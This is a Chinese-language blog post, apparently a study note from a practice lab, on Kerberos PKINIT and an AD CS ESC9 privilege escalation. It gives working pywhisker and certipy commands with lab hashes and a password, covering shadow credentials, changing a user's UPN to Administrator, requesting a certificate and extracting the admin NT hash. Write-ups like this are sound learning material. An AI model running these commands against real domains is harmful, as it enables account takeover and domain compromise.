<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"dawoxiansigema.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":true,"version":"8.26.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="仅学习记录用">
<meta property="og:type" content="article">
<meta property="og:title" content="Kerberos协议及攻击">
<meta property="og:url" content="http://dawoxiansigema.github.io/2025/11/12/Kerberos%E5%8D%8F%E8%AE%AE%E5%8F%8A%E6%94%BB%E5%87%BB/index.html">
<meta property="og:site_name" content="Eur3ka&#39;s Studio">
<meta property="og:description" content="仅学习记录用">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2025-11-12T14:27:55.000Z">
<meta property="article:modified_time" content="2025-11-13T15:32:08.000Z">
<meta property="article:author" content="Xu Haoxiang">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://dawoxiansigema.github.io/2025/11/12/Kerberos%E5%8D%8F%E8%AE%AE%E5%8F%8A%E6%94%BB%E5%87%BB/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://dawoxiansigema.github.io/2025/11/12/Kerberos%E5%8D%8F%E8%AE%AE%E5%8F%8A%E6%94%BB%E5%87%BB/","path":"2025/11/12/Kerberos协议及攻击/","title":"Kerberos协议及攻击"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>Kerberos协议及攻击 | Eur3ka's Studio</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  






  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Eur3ka's Studio</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li><li class="menu-item menu-item-docs"><a href="/docs/" rel="section"><i class="fa fa-book fa-fw"></i>Docs</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8D%8F%E8%AE%AE"><span class="nav-number">1.</span> <span class="nav-text">协议</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#PKINIT"><span class="nav-number">1.1.</span> <span class="nav-text">PKINIT</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%94%BB%E5%87%BB"><span class="nav-number">2.</span> <span class="nav-text">攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#ESC9"><span class="nav-number">2.1.</span> <span class="nav-text">ESC9</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Xu Haoxiang"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">Xu Haoxiang</p>
  <div class="site-description" itemprop="description">Never again.</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">18</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">categories</span>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://dawoxiansigema.github.io/2025/11/12/Kerberos%E5%8D%8F%E8%AE%AE%E5%8F%8A%E6%94%BB%E5%87%BB/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="Xu Haoxiang">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Eur3ka's Studio">
      <meta itemprop="description" content="Never again.">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="Kerberos协议及攻击 | Eur3ka's Studio">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Kerberos协议及攻击
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2025-11-12 22:27:55" itemprop="dateCreated datePublished" datetime="2025-11-12T22:27:55+08:00">2025-11-12</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2025-11-13 23:32:08" itemprop="dateModified" datetime="2025-11-13T23:32:08+08:00">2025-11-13</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Windows-Penetration-Skills/" itemprop="url" rel="index"><span itemprop="name">Windows Penetration Skills</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>仅学习记录用</p>
<span id="more"></span>

<h1 id="协议"><a href="#协议" class="headerlink" title="协议"></a>协议</h1><h2 id="PKINIT"><a href="#PKINIT" class="headerlink" title="PKINIT"></a>PKINIT</h2><p>PKINIT 是 Kerberos 协议的扩展，允许使用 X.509 证书代替密码进行身份认证。例如，当我们使用 pywhisker.py 向 management_svc 的 msDS-KeyCredentialLink 属性中添加生成的证书信息后意味着</p>
<ul>
<li>域控制器（KDC）会信任该证书与 management_svc 账号的绑定关系。</li>
<li>持有该证书私钥的人，可通过 PKINIT 协议向 KDC 请求 management_svc 的 TGT（无需知道其密码）。</li>
</ul>
<p>该部分与委派不同 委派本质是权限传递 而PKINIT本质是直接扮演</p>
<pre><code>┌──(kali㉿kali)-[~/Desktop/red/pywhisker/pywhisker]
└─$ python3 pywhisker.py -d &quot;certified.htb&quot; -u &quot;judith.mader&quot; -p &quot;judith09&quot; --target &quot;management_svc&quot; --action &quot;add&quot;
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: f1ba22ce-463f-67f3-50a4-285a113ea68f
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -&gt; PFX with cryptography: VE69zj7b.pfx
[+] PFX exportiert nach: VE69zj7b.pfx
[i] Passwort für PFX: 8mhSSs9ylJfNe4oQPh9P
[+] Saved PFX (#PKCS12) certificate &amp; key at path: VE69zj7b.pfx
[*] Must be used with password: 8mhSSs9ylJfNe4oQPh9P
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
</code></pre>
<p>比如上述payload显示<code>pywhisker.py</code>利用委派获取management_svc的TGT 因为他们在同组很好办到 拿到TGT之后还有剩下的操作来获取NTLM 不过可以使用<code>certipy</code>来一条龙 比<code>pywhisker.py</code>方便</p>
<h1 id="攻击"><a href="#攻击" class="headerlink" title="攻击"></a>攻击</h1><p>以下漏洞都是基于certipy进行查找与攻击 <a target="_blank" rel="noopener" href="https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation">官方exploit</a></p>
<pre><code>certipy find -vulnerable -u ca_operator -hashes :b4b86f45c6018f1b664f70805f45d8f2 -dc-ip 10.10.11.41 -stdout
</code></pre>
<h2 id="ESC9"><a href="#ESC9" class="headerlink" title="ESC9"></a>ESC9</h2><p>ESC9 漏洞，与名为 CertifiedAuthentication 的证书模板相关。此漏洞的核心在于：对证书模板拥有注册权限的用户可以请求证书，并且由于模板配置不当（缺少必要的安全扩展，如 CT_FLAG_NO_SECURITY_EXTENSION 未设置），攻击者可以通过在证书请求中指定一个备用主体名 (SAN) 来冒充其他用户，例如域管理员。</p>
<p>以<a href="/2025/11/10/Certified">Certified</a>靶机为例 使用certipy找到存在ESC9漏洞后 执行如下步骤</p>
<ul>
<li>management_svc对ca_operator有GenericAll权限 使用exploit修改ca_operator的UPN(userPrincipalName)为Administrator</li>
</ul>
<p>通过篡改低权限 “受害者账户” 的 UPN，让申请到的证书 SAN 字段包含高权限账户的标识，进而欺骗域控制器获取高权限凭证。</p>
<pre><code>certipy account update -u management_svc -hashes :a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator -dc-ip 10.10.11.41 
</code></pre>
<ul>
<li>篡改UPN权限后 生成证书模板 模板名字为在certipy -find中可以查到</li>
</ul>
<pre><code>certipy req -u ca_operator -hashes :b4b86f45c6018f1b664f70805f45d8f2 -ca certified-DC01-CA -template CertifiedAuthentication -dc-ip 10.10.11.41
</code></pre>
<ul>
<li>生成完证书模板之后 需要将ca_operator的UPN再改回去 因为一会要通过证书认证(此步不做也不一定百分百会失败)</li>
</ul>
<pre><code>certipy account update -u management_svc -hashes :a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator@certified.htb -dc-ip 10.10.11.41 
</code></pre>
<ul>
<li>最后通过生成的pfx证书 获取管理员的NTLM哈希</li>
</ul>
<p><code>certipy auth -pfx</code> 命令的作用是：用证书向域控制器的 KDC 服务请求 Kerberos 票据（TGT）。<br>域控制器收到请求后，检查证书的 SAN 字段，发现 UPN 是administrator，且因缺少安全扩展无法验证 SID，便默认该证书属于administrator账户。<br>因此，KDC 会为 “administrator” 签发 TGT（票据授予票据），甚至允许提取该账户的 NT 哈希（通过 Kerberos 协议的某些扩展功能）。</p>
<pre><code>certipy auth -pfx administrator.pfx -dc-ip 10.10.11.41 -domain certified.htb
</code></pre>
<p>据此就可以通过certipy获取获取管理员的NTLM哈希</p>

    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/11/10/Certified/" rel="prev" title="Certified">
                  <i class="fa fa-angle-left"></i> Certified
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/11/27/Administrator/" rel="next" title="Administrator">
                  Administrator <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Xu Haoxiang</span>
  </div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
